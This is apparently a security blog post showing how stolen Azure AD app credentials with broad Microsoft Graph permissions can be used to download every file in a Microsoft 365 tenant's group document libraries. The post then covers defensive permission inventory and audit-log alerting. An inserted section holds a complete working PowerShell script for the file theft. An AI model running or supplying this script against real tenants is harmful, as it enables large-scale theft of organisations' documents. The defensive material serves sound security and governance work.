Microsoft 365 Data Exfiltration – Attack and Defend


Attackers are turning their eyes towards the cloud, and since heavy data exfiltration is now a standard part of ransomware attacks, I wanted to create an eye-opening PoC of how over-privileged app permissions in Azure AD / Microsoft Graph can be abused as part of such an attack. I have added a new tool to my DCToolbox PowerShell module called Invoke-DCM365DataExfiltration. Let me show you what scary stuff it can do with a set of stolen app credentials.

This script is a proof of concept and for testing purposes only. Do not use this script in an unethical or unlawful way. Don’t be stupid!

The Problem With Risky API Permissions

In almost every tenant I visit, I find insecure app registrations with privileged API permissions assigned. Some examples of the problems I see are app owners without MFA, too many Application Administrators in the tenant, highly privileged app registrations protected by client secrets instead of certificates, and so on. The list is long, but it all boils down to two major risks:

  • Possible privilege escalation paths
  • Possible data exfiltration

In this blog post I will showcase how an attacker can perform data exfiltration with Microsoft Graph. I will also explain what you can do to minimize risks.

Invoke-DCM365DataExfiltration

The tool I have created shows how an attacker can exfiltrate huge amounts of files from a Microsoft 365 tenant using a poorly protected Azure AD app registration that has any of the following commonly used Microsoft Graph application permissions assigned. Application permissions are app-only: they are not scoped to a signed-in user, so a single leaked credential reaches every site in the tenant.

  • Files.Read.All
  • Files.ReadWrite.All
  • Sites.Read.All
  • Sites.ReadWrite.All

In addition, one of the following permissions is required to enumerate Microsoft 365 groups and their SharePoint document libraries:

  • GroupMember.Read.All
  • Group.Read.All
  • Directory.Read.All
  • Group.ReadWrite.All
  • Directory.ReadWrite.All

The script loops through all Microsoft 365 groups and their respective SharePoint Online document libraries (the storage behind Microsoft Teams files) and downloads every file it can find, recursing three folder levels deep. The files are written to the current working directory of the PowerShell session.

A list of downloaded files will be copied to the clipboard after completion.

If you want to test the script, I recommend running it with the -WhatIf parameter, which skips the actual downloads but still prints what would have been downloaded.

You can install DCToolbox from the PowerShell gallery with:

You can run Invoke-DCM365DataExfiltration in WhatIf mode like this:

Example output:

The script uses the following Graph API endpoints to find and download files in the tenant:

Feel free to check out the source code in the PowerShell module if you’re interested in the actual API calls.
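As an added example that is not part of the original post or the DCToolbox module, here is the same flow rebuilt directly on the Graph REST endpoints the tool relies on: an app-only token from the client credentials grant, group enumeration, each group's default document library, a bounded recursive walk of its folders, and the download itself. The tenant name, client ID and secret are placeholders, the three-level limit mirrors the behaviour described above, and the DCToolbox parameter names mentioned in the comments are an assumption; the module itself installs from the PowerShell Gallery with Install-Module.

```powershell
# Added example, not the DCToolbox source: the exfiltration flow rebuilt on the Graph REST
# endpoints so the permission requirements and the call order are explicit.
# Placeholders: tenant, client ID and secret are not real. The real tool installs with
#   Install-Module -Name DCToolbox
# and its parameter names (-ClientID -ClientSecret -TenantName -WhatIf) are an assumption.

function Get-AppOnlyToken {
    # OAuth 2.0 client credentials grant: no user, no MFA, no user Conditional Access,
    # just the leaked secret. This is why a secret on a privileged app is the whole game.
    param([string]$TenantId, [string]$ClientId, [string]$ClientSecret)
    $body = @{
        grant_type    = 'client_credentials'
        client_id     = $ClientId
        client_secret = $ClientSecret
        scope         = 'https://graph.microsoft.com/.default'
    }
    (Invoke-RestMethod -Method Post -Body $body `
        -Uri "https://login.microsoftonline.com/$TenantId/oauth2/v2.0/token").access_token
}

function Invoke-GraphPaged {
    # GET a Graph collection and follow @odata.nextLink until exhausted.
    param([string]$Uri, [hashtable]$Headers)
    while ($Uri) {
        $page = Invoke-RestMethod -Method Get -Uri $Uri -Headers $Headers
        $page.value
        $Uri = $page.'@odata.nextLink'
    }
}

function Get-DriveFiles {
    # Walk one document library, recursing at most $MaxDepth folder levels below the root.
    param([string]$DriveId, [string]$ItemId, [hashtable]$Headers, [string]$Path, [int]$Depth, [int]$MaxDepth)
    $uri = if ($ItemId -eq 'root') { "https://graph.microsoft.com/v1.0/drives/$DriveId/root/children" }
           else { "https://graph.microsoft.com/v1.0/drives/$DriveId/items/$ItemId/children" }
    foreach ($child in Invoke-GraphPaged -Uri $uri -Headers $Headers) {
        if ($child.folder) {
            if ($Depth -lt $MaxDepth) {
                Get-DriveFiles -DriveId $DriveId -ItemId $child.id -Headers $Headers `
                    -Path "$Path/$($child.name)" -Depth ($Depth + 1) -MaxDepth $MaxDepth
            }
        }
        else {
            [pscustomobject]@{
                Path        = "$Path/$($child.name)"
                Size        = $child.size
                DownloadUrl = $child.'@microsoft.graph.downloadUrl'   # pre-authenticated, short-lived
                ContentUri  = "https://graph.microsoft.com/v1.0/drives/$DriveId/items/$($child.id)/content"
            }
        }
    }
}

function Invoke-GroupDriveDump {
    # Enumerate Microsoft 365 groups (Group.Read.All / GroupMember.Read.All / Directory.Read.All),
    # then each group's default document library and its files (Files.Read.All / Sites.Read.All).
    param([string]$TenantId, [string]$ClientId, [string]$ClientSecret, [int]$MaxDepth = 3, [switch]$WhatIf)
    $headers = @{ Authorization = "Bearer $(Get-AppOnlyToken -TenantId $TenantId -ClientId $ClientId -ClientSecret $ClientSecret)" }
    $groups  = Invoke-GraphPaged -Headers $headers `
        -Uri "https://graph.microsoft.com/v1.0/groups?`$filter=groupTypes/any(c:c eq 'Unified')&`$select=id,displayName"
    foreach ($group in $groups) {
        try   { $drive = Invoke-RestMethod -Uri "https://graph.microsoft.com/v1.0/groups/$($group.id)/drive" -Headers $headers }
        catch { continue }   # site not provisioned yet, or the app lacks access
        $files = Get-DriveFiles -DriveId $drive.id -ItemId 'root' -Headers $headers -Path $group.displayName -Depth 0 -MaxDepth $MaxDepth
        foreach ($file in $files) {
            if ($WhatIf) { Write-Host "WhatIf: would download $($file.Path) ($($file.Size) bytes)" }
            else {
                # Flatten the path into one file name under the current directory.
                $target = Join-Path (Get-Location) ($file.Path -replace '[\\/:*?"<>|]', '_')
                if ($file.DownloadUrl) { Invoke-WebRequest -Uri $file.DownloadUrl -OutFile $target }
                else { Invoke-WebRequest -Uri $file.ContentUri -Headers $headers -OutFile $target }
            }
            $file   # emit the inventory regardless of -WhatIf
        }
    }
}

# Usage (placeholders, not real credentials); -WhatIf lists without downloading:
# Invoke-GroupDriveDump -TenantId 'contoso.onmicrosoft.com' -ClientId '<app id>' -ClientSecret '<secret>' -WhatIf
```

Note what is absent from the token request: there is no user, so user MFA and user-scoped Conditional Access never enter the picture. The only thing standing between the attacker and every document library in the tenant is how well that client secret was protected.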

Defending

It is of utmost importance that we take application security in Azure AD seriously, especially when assigning application permissions to an API like Microsoft Graph. Make sure to regularly inventory assigned API permissions. I like to use this script to do that.
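Here is an added example of such an inventory, written for this page rather than taken from the script linked above. It assumes an existing Connect-MgGraph session (Microsoft Graph PowerShell SDK) holding at least Application.Read.All and uses only Invoke-MgGraphRequest, so the REST calls stay visible: it lists every application permission granted on the Microsoft Graph service principal via appRoleAssignedTo, flags the permissions this post abuses, and reports whether the owning app registration is protected by client secrets or by certificates.

```powershell
# Added example, not the inventory script the post links to.
# Assumes: Connect-MgGraph already run with at least Application.Read.All.

$RiskyGraphPermissions = @('Files.Read.All', 'Files.ReadWrite.All', 'Sites.Read.All', 'Sites.ReadWrite.All',
    'GroupMember.Read.All', 'Group.Read.All', 'Group.ReadWrite.All', 'Directory.Read.All', 'Directory.ReadWrite.All')
$GraphAppId = '00000003-0000-0000-c000-000000000000'   # well-known appId of the Microsoft Graph service principal

function Invoke-GraphGetAll {
    # GET a collection and follow @odata.nextLink.
    param([string]$Uri)
    while ($Uri) {
        $page = Invoke-MgGraphRequest -Method GET -Uri $Uri
        $page.value
        $Uri = $page.'@odata.nextLink'
    }
}

function Get-GraphApplicationPermissionGrants {
    # Every app role (application permission) granted ON Microsoft Graph, resolved to its name.
    $graphSp  = Invoke-GraphGetAll -Uri "https://graph.microsoft.com/v1.0/servicePrincipals?`$filter=appId eq '$GraphAppId'&`$select=id,appRoles" |
                Select-Object -First 1
    $roleById = @{}
    foreach ($role in $graphSp.appRoles) { $roleById[$role.id] = $role.value }
    Invoke-GraphGetAll -Uri "https://graph.microsoft.com/v1.0/servicePrincipals/$($graphSp.id)/appRoleAssignedTo" |
        ForEach-Object {
            [pscustomobject]@{
                PrincipalId   = $_.principalId
                PrincipalName = $_.principalDisplayName
                Permission    = $roleById[$_.appRoleId]
            }
        }
}

function Get-AppCredentialSummary {
    # Which credential types protect the app registration behind this service principal?
    param([string]$ServicePrincipalId)
    $sp = Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/servicePrincipals/$($ServicePrincipalId)?`$select=appId,servicePrincipalType"
    if ($sp.servicePrincipalType -ne 'Application') { return "n/a ($($sp.servicePrincipalType))" }   # e.g. ManagedIdentity
    $app = Invoke-GraphGetAll -Uri "https://graph.microsoft.com/v1.0/applications?`$filter=appId eq '$($sp.appId)'&`$select=passwordCredentials,keyCredentials" |
           Select-Object -First 1
    if (-not $app) { return 'registered in another tenant' }   # multi-tenant app consented here
    $secrets = @($app.passwordCredentials | Where-Object { $null -ne $_ }).Count
    $certs   = @($app.keyCredentials      | Where-Object { $null -ne $_ }).Count
    "secrets=$secrets certs=$certs" + $(if ($secrets -gt 0) { ' <- secret-based, prefer certificates' } else { '' })
}

function Find-RiskyGraphAppPermissions {
    # One row per principal holding any of the permissions this post abuses.
    Get-GraphApplicationPermissionGrants |
        Where-Object { $_.Permission -in $RiskyGraphPermissions } |
        Group-Object PrincipalId | ForEach-Object {
            [pscustomobject]@{
                Principal   = $_.Group[0].PrincipalName
                Permissions = ($_.Group.Permission | Sort-Object -Unique) -join ', '
                Credentials = Get-AppCredentialSummary -ServicePrincipalId $_.Name
            }
        }
}

# Usage: Connect-MgGraph -Scopes 'Application.Read.All'; Find-RiskyGraphAppPermissions | Format-Table -AutoSize
```

Reading appRoleAssignedTo on the Graph service principal is the cheap way to answer "who can do this to us?" in one query, instead of opening every app registration in the portal. Treat any row that combines Files/Sites permissions with a secret-based credential as the first thing to fix.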

Create alert rules in your SIEM for any API permission assignment, and react when highly privileged permissions (like the ones listed above) are granted. Defender for Cloud Apps also has built-in alerts that trigger on mass downloads and similar anomalies. Make sure you react to those! Monitor for new client secrets and certificates being added to existing apps as well: adding a fresh credential to an already privileged app registration is a classic privilege escalation step.
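The alert logic described above, as an added example that is not part of the original post, run offline over a few constructed audit records (not real log data). The record shape follows the Graph directoryAudits resource (activityDisplayName, initiatedBy, targetResources with modifiedProperties), and the activity names are the ones Azure AD writes for app role assignments and credential changes; the AppRole.Value property name is an assumption and should be checked against your own logs before this becomes a SIEM rule. The example also correlates the two signals, because a risky permission grant followed by a new credential on the same app within a short window is the escalation chain worth paging on.

```powershell
# Added example, not from the post: the alerting described above, exercised against
# constructed Azure AD audit records so it runs offline. "AppRole.Value" is an assumed
# property name; verify it against real directoryAudits output before relying on it.

$RiskyGraphPermissions = @('Files.Read.All', 'Files.ReadWrite.All', 'Sites.Read.All', 'Sites.ReadWrite.All',
    'GroupMember.Read.All', 'Group.Read.All', 'Group.ReadWrite.All', 'Directory.Read.All', 'Directory.ReadWrite.All')

$PermissionActivity   = 'Add app role assignment to service principal'
$CredentialActivities = @('Update application – Certificates and secrets management',
                          'Add service principal credentials')

# Constructed sample events (not real logs). newValue is JSON-encoded, as in real audit records.
$SampleEvents = @'
[
 {"activityDateTime":"2025-07-13T08:01:00Z","activityDisplayName":"Add app role assignment to service principal",
  "initiatedBy":{"user":{"userPrincipalName":"admin@contoso.example"}},
  "targetResources":[{"displayName":"HR-Sync","type":"ServicePrincipal",
    "modifiedProperties":[{"displayName":"AppRole.Value","newValue":"\"Files.Read.All\""}]}]},
 {"activityDateTime":"2025-07-13T08:02:00Z","activityDisplayName":"Add app role assignment to service principal",
  "initiatedBy":{"user":{"userPrincipalName":"admin@contoso.example"}},
  "targetResources":[{"displayName":"Mail-Bot","type":"ServicePrincipal",
    "modifiedProperties":[{"displayName":"AppRole.Value","newValue":"\"User.Read.All\""}]}]},
 {"activityDateTime":"2025-07-13T08:20:00Z","activityDisplayName":"Update application – Certificates and secrets management",
  "initiatedBy":{"user":{"userPrincipalName":"helpdesk@contoso.example"}},
  "targetResources":[{"displayName":"HR-Sync","type":"Application","modifiedProperties":[]}]}
]
'@

function Find-AppPermissionAlerts {
    # One alert per risky permission grant (High) and per credential change (Medium).
    param([object[]]$Events)
    foreach ($e in $Events) {
        $actor = $e.initiatedBy.user.userPrincipalName
        foreach ($t in $e.targetResources) {
            if ($e.activityDisplayName -eq $PermissionActivity) {
                $granted = $t.modifiedProperties |
                    Where-Object { $_.displayName -eq 'AppRole.Value' } |
                    ForEach-Object { $_.newValue.Trim('"') }
                foreach ($perm in $granted) {
                    if ($perm -in $RiskyGraphPermissions) {
                        [pscustomobject]@{ Time = $e.activityDateTime; Severity = 'High'; App = $t.displayName
                                           Actor = $actor; Kind = 'permission'; Detail = "application permission $perm granted" }
                    }
                }
            }
            elseif ($e.activityDisplayName -in $CredentialActivities) {
                [pscustomobject]@{ Time = $e.activityDateTime; Severity = 'Medium'; App = $t.displayName
                                   Actor = $actor; Kind = 'credential'; Detail = 'new secret or certificate added' }
            }
        }
    }
}

function Find-EscalationChains {
    # Same app gains a risky permission AND a new credential inside the window: that is the
    # privilege escalation pattern, so raise one Critical finding instead of two loose alerts.
    param([object[]]$Alerts, [int]$WindowMinutes = 60)
    $Alerts | Group-Object App | ForEach-Object {
        $kinds = @($_.Group.Kind)
        $times = @($_.Group.Time | ForEach-Object { [datetime]$_ } | Sort-Object)
        if (($kinds -contains 'permission') -and ($kinds -contains 'credential') -and
            (($times[-1] - $times[0]).TotalMinutes -le $WindowMinutes)) {
            [pscustomobject]@{ App = $_.Name; Severity = 'Critical'; Events = $_.Group.Count
                               Detail = "risky permission and new credential within $WindowMinutes minutes" }
        }
    }
}

$alerts = Find-AppPermissionAlerts -Events (ConvertFrom-Json $SampleEvents)
$alerts | Format-Table Time, Severity, App, Actor, Detail -AutoSize
Find-EscalationChains -Alerts $alerts | Format-Table -AutoSize
```

The sample is built so that HR-Sync trips both rules (a Files.Read.All grant, then a new credential nineteen minutes later) and is therefore promoted to a single Critical chain, while Mail-Bot's User.Read.All grant stays below the threshold and produces nothing. In a real SIEM the same two-stage logic applies: alert on the individual events, but escalate when they land on the same app.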

And of course, practice attack and defense! See if you could pull off this attack in WhatIf mode in your tenant, or in a test tenant (with proper authorization to do so, of course).

I will use this PoC to make sure people understand the seriousness of good API permission governance, and I hope it can be useful for someone else as well.

 

(c) Daniel Chronlund
